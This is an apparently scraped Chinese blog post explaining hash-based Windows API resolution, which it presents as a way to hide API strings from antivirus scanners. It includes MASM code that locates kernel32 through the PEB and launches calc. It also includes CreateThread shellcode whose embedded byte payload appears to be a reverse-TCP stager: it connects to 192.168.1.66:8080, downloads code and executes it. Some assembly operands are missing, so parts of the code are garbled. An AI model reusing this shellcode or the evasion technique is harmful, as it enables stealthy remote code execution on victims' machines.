hash算法搜索获得api函数地址的实现,"kernel32.dll", "CreateThread"
我们一般要获得一个函数的地址,通常采用的是明文,例如定义一个api函数字符串"MessageBoxA",然后在GetProcAddress函数中一个字节一个字节进行比较。这样弊端很多,例如如果我们定义一个杀毒软件比较敏感的api函数字符串,那么可能就会增加杀毒软件对我们的程序的判定值,而且定义这些字符串还有一个弊端是占用的字节数较大。我们想想如何我们的api函数字符串通过算法将它定义成一个4字节的值,然后在GetProcAddress中把AddressOfNames表中的每个地址指向的api字符串通过我们的算法压缩成4字节值后,与我们之前定义的4字节值进行判断,如果匹配成功则读取函数地址。
我们来看一种rol 3移位算法,这个算法是每次将目的地址循环向左移动3位,然后将低字节与源字符串的每个字节进行异或。算法很精巧方便。还有很多方便小巧的算法,例如ROR 13等算法,其实它和我们上面的基本一样,只不过它将函数名表的字符串通过我们的算法过程获得hash值后与我们之前定义的hash值进行匹配,匹配成功则获得对应函数的地址。
下面的代码通过hash搜索WinExec函数来运行Clac:
.
.model flat, stdcall
option casemap:none include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib .const
szCalc db 'calc.exe', .code _GetKrnl32 proc ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 获取kernel32.dll的地址,因为xp和win7不一样
; 故采用比较名称的方式获取地址,具体见Kernel32基地址获得学习
; http://blog.csdn.net/programmingring/article/details/11357393
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
assume fs:nothing
mov eax, fs:[30h]
mov eax, [eax + 0ch]
mov eax, [eax + 1ch] ; 第一个LDR_MODULE ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 压入kernel32.dll的unicode字符串
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
push dword ptr 006ch
push dword ptr 6c0064h
push dword ptr 2e0032h
push dword ptr 33006ch
push dword ptr 65006eh
push dword ptr 720065h
push word ptr 006bh
mov ebx, esp ; ebx指向字符串 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 开始比较
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Search:
cmp eax,
jz _NotFound
cmp eax, 0ffffffffh
jz _NotFound
lea esi, [eax + 1ch] ; esi指向UNICODE_STRING结构
xor ecx, ecx
mov cx, ; 比较的长度
mov esi, [esi + ] ; 获得UNICODE_STRING结构的Buffer成员
mov edi, ebx ; edi指向kernel32unicode字符串
repz cmpsw
or ecx, ecx ; ecx减完说明相等
jz _Found
mov eax, [eax] ; 获取下一个LDR_MODULE
jmp _Search _NotFound:
mov eax, 0ffffffffh
jmp _Over _Found:
mov eax, [eax + 08h] ; 获得地址 _Over:
add esp,
ret _GetKrnl32 endp _GetRolHash proc _lpApiString mov eax, _lpApiString
push esi
xor edx, edx
xchg eax, esi ; esi = _lpApiString
cld ; 递增 _Next:
lodsb ; 从esi指向的地址中取一个字符
test al, al ; 比较是否为0
jz _Ret
rol edx, ; 左循环移位3位
xor dl, al ; 低字节和字符异或
jmp _Next _Ret:
xchg eax, edx ; eax = 处理后的_lpApiString的hash
pop esi
ret _GetRolHash endp _GetApi proc _hDllHandle, _iHashApi push ebp
mov eax, _hDllHandle
mov ecx, _iHashApi
mov ebx, eax
mov edi, ecx mov eax, [ebx + 3ch]
mov esi, [ebx + eax + 78h] ; Get Export RVA
lea esi, [esi + ebx + IMAGE_EXPORT_DIRECTORY.NumberOfNames]
lodsd
xchg eax, edx ; edx = NumberOfNames
lodsd
push eax ; [esp] = AddressOfFunctions
lodsd
xchg eax, ebp ; ebp = AddressOfNames
lodsd
xchg eax, ebp ; ebp = AddressOfNameOrdinals, eax = AddressOfNames
add eax, ebx
xchg eax, esi ; esi = AddressOfNames _LoopScas:
dec edx
js _Ret
lodsd ; eax = api名称的rva
add eax, ebx ; eax = api名称的实际地址
push edx
invoke _GetRolHash, eax ; 计算hash字符串 pop edx
cmp eax, edi ; 比较和传入的hash参数是否相等
jz _GetAddr add ebp, ; 递增,和esi相对应
jmp _LoopScas _GetAddr:
movzx eax, word ptr [ebp + ebx] ; 取得序号值
shl eax, ; 乘4
add eax, [esp] ; 在AddressOfFunctions取得相应序号值位置的值
mov eax, [ebx + eax] ; 取得函数地址
add eax, ebx _Ret:
pop ecx
pop ebp
ret _GetApi endp _WinMain proc invoke _GetKrnl32
invoke _GetApi, eax, 016ef74bh ; "WinExec"的hash
push SW_SHOW
lea ebx, szCalc
push ebx
call eax
ret _WinMain endp start:
call _WinMain
invoke ExitProcess, end start
另外一段代码:新建一个线程的shellcode,payload: 后面的内容为要新建线程要执行的内容。
[BITS 32]
[ORG 0]
cld
call start
delta:
%include "block_api.asm"
start:
pop ebp ; pop off the address of 'api_call' for calling later.
xor eax, eax
push eax
push eax
push eax
lea ebx, [ebp+threadstart-delta]
push ebx
push eax
push eax
push 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
call ebp ; CreateThread( NULL, 0, &threadstart, NULL, 0, NULL );
jmp end
threadstart:
pop eax ; pop off the unused thread param so the prepended shellcode can just return when done.
payload: db 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x42,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5
end
上面代码里block_api.asm
api_call:
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
mov ebp, esp ; Create a new stack frame
xor eax, eax ; Zero EAX (upper 3 bytes will remain zero until function is found)
mov edx, [fs:eax+48] ; Get a pointer to the PEB
mov edx, [edx+12] ; Get PEB->Ldr
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
lodsb ; Read in the next byte of the name
cmp al, 'a' ; Some versions of Windows use lower case module names
jl not_lowercase ;
sub al, 0x20 ; If so normalise to uppercase
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop until we have read enough ; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to iterate the export address table,
mov edx, [edx+16] ; Get this modules base address
mov ecx, [edx+60] ; Get PE header ; use ecx as our EAT pointer here so we can take advantage of jecxz.
mov ecx, [ecx+edx+120] ; Get the EAT from the PE header
jecxz get_next_mod1 ; If no EAT present, process the next module
add ecx, edx ; Add the modules base address
push ecx ; Save the current modules EAT
mov ebx, [ecx+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
mov ecx, [ecx+24] ; Get the number of function names
; now ecx returns to its regularly scheduled counter duties ; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
dec ecx ; Decrement the function name counter
mov esi, [ebx+ecx*4] ; Get rva of next module name
add esi, edx ; Add the modules base address
xor edi, edi ; Clear EDI which will store the hash of the function name
; And compare it to the one we want
loop_funcname: ;
lodsb ; Read in the next byte of the ASCII function name
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searching for
jnz get_next_func ; Go compute the next function hash if we have not found it ; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
; We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx ; Clear off the current modules hash
pop ebx ; Clear off the current position in the module list
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx ; Pop off the origional return address our caller will have pushed
pop edx ; Pop off the hash value our caller will have pushed
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller... get_next_mod: ;
pop edi ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp short next_mod ; Process this module
hash算法搜索获得api函数地址的实现,"kernel32.dll", "CreateThread"的更多相关文章
- 逐步实现hash算法(基于BKDRhash函数)
哈希(Hash)算法,即散列函数.它是一种单向密码体制,即它是一个从明文到密文的不可逆的映射,只有加密过程,没有解密过程.同时,哈希函数可以将任意长度的输入经过变化以后得到固定长度的输出.hash算法 ...
- hash算法
作者:July.wuliming.pkuoliver 说明:本文分为三部分内容, 第一部分为一道百度面试题Top K算法的详解:第二部分为关于Hash表算法的详细阐述:第三部分为打造一个最快的Hash ...
- Hash算法的讲解
散列表,又叫哈希表,它是基于快速存取的角度设计的,也是一种典型的“空间换时间”的做法.顾名思义,该数据结构可以理解为一个线性表,但是其中的元素不是紧密排列的,而是可能存在空隙. 散列表(Hash ta ...
- 旧书重温:0day2【4】动态获取函数地址
通过以上3篇文章的学习,我们已经可以获取到kernel32.dll的地址了下一步 我们就是获取几个重要的函数 1.GetProcAddress 2.LoadLibrary 有了这两个函数很多函数都可以 ...
- advapi32.dll kernel32.dll 中的两套注册表API
日前遇到一件事:WebBrowser中的网页会用到一个“大众”ActiveX控件,为了保证兼容性以及和其它程序互不干扰,我们采用这样一种方案: 1. 我们的软件会自带该控件: 2. 如果系统中已注册有 ...
- HASH、HASH函数、HASH算法的通俗理解
之前经常遇到hash函数或者经常用到hash函数,但是hash到底是什么?或者hash函数到底是什么?却很少去考虑.最近同学去面试被问到这个问题,自己看文章也看到hash的问题.遂较为细致的追究了一番 ...
- hash算法和常见的hash函数 [转]
Hash,就是把任意长度的输入,通过散列算法,变换成固定长度的输出,该输出就是散列值. 这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能 会散列成相同的输出,而不 ...
- [区块链] 密码学中Hash算法(基础)
在介绍Hash算法之前,先给大家来个数据结构中对hash表(散列表)的简单解释,然后我再逐步深入,讲解一下hash算法. 一.Hash原理——基础篇 1.1 概念 哈希表就是一种以 键-值(key-i ...
- Hash算法入门指南(聊点不一样的算法人生)
前言 很多人到现在为止都总是问我算法该怎么学啊,数据结构好难啊怎么的,学习难度被莫名的夸大了,其实不然.对于一个学计算机相关专业的人都知道,数据结构是大学的一门必修课,数据结构与算法是基础,却常常容易 ...
随机推荐
- Beats Solo3 Wireless 无法链接 MacBook pro
Beats Solo3 Wireless 无法链接 MacBook pro 问题解决了,原来只要长按耳机的开关按钮就能被识别到了,貌似需要5秒钟不松手. https://bbs.feng.com/re ...
- HashMap的扩容机制以及默认大小为何是2次幂
HashMap的Put方法 回顾HashMap的put(Key k, Value v)过程: (1)对 Key求Hash值,对n-1取模计算出Hash表数组下标 (2)如果没有碰撞,直接放入桶中,即H ...
- postman 断言学习
请求 url :https://www.v2ex.com/api/nodes/show.json?name=python get请求 postman发起请求并做断言 断言: tests["B ...
- 【比赛】HNOI2018 毒瘤
虚树+dp 直接看zlttttt的强大题解 zlttttt的题解看这里 #include<bits/stdc++.h> #define ui unsigned int #define ll ...
- 【NOIP2017】宝藏(状态压缩,动态规划)
[NOIP2017]宝藏(状态压缩,动态规划) 题面 洛谷 题目描述 参与考古挖掘的小明得到了一份藏宝图,藏宝图上标出了 n 个深埋在地下的宝藏屋, 也给出了这 n 个宝藏屋之间可供开发的 m 条道路 ...
- redis安全性 添加访问密码
设置客户端连接访问redis服务器必须进行身份验证. vi打开编辑redis配置文件:[root@martin etc]# vi /usr/local/redis/etc/redis.conf 在约1 ...
- msf下的LNK漏洞(CVE-2017-8464)利用
0x01 前言 RCE漏洞存在于Windows处理LNK文件的环节.攻击者利用漏洞可以获得与本地用户相同的用户权限.被使用此漏洞攻击时,用户权限较少的账户相较管理员权限的用户受到的影响更小. 攻击者可 ...
- Error: Chromium revision is not downloaded. Failed to download Chromium
在使用prerender-spa-plugin做前端预渲染的时候,安装puppeteer的时候因为下载Chromium 失败报错,有如下解决方法: 1.使用Chromium 国内源 npm confi ...
- 「Python」10个python项目
1. Pillow. Pillow是由Alex Clark以及其他贡献者实现的“友好版”的PIL.PIL即Python Imaging Library,作者是Fredrik Lundh及其他开发者.A ...
- MyEclipse解决Launching xx on MyEclipse Tomcat has encountered a problem
单击工具栏Run,选中Run Configurations... 将MyEclipse Server Application里面的工程右击选择Delete就好了.